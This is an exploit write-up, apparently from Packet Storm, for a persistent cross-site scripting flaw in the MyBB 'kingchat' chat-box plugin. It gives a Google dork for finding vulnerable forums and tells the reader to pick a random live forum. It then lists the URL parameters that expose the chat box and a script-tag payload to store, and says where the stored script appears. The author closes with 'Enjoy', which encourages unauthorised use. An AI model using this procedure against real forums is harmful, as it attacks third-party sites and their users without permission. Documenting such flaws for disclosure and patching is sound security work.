MyBB Kingchat plugin suffers from a cross site scripting vulnerability.
f94936996d8bbc5aab405f1a278b3a60ca5bd96993d1d961b16d7ab401fe2618Exploit Title: MyBB 'kingchat' chat-box plugin.
Google Dork: inurl:/kingchat.php?
Date: 8/12/12
Author: VipVince
Vendor Homepage: http://mods.mybb.com/
Software LinK: http://mods.mybb.com/view/kingchat
Tested on: Windows
Using the dork inurl:/kingchat.php? you will see multiple forums running this chat plugin.
Note *Registration on the forums is required* for persistent XSS to work.
Now click a random forum with this plugin installed and you will see this:
http://vulnforum.com/kingchat.php?notic
Remove 'notic' at the end of the URL and add "chat=2&1=2" to our query so it becomes:
http://server/kingchat.php?chat=2&l=2
You will see the vulnerable chat box :). Submit your XSS for instance <script>alert("vipvince")</script>
Now to see our saved JavaScript alert go to:
http://server/kingchat.php?chat=2&l=2&message=
Your persistant XSS will be stored here.
Enjoy ;). VipVince.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed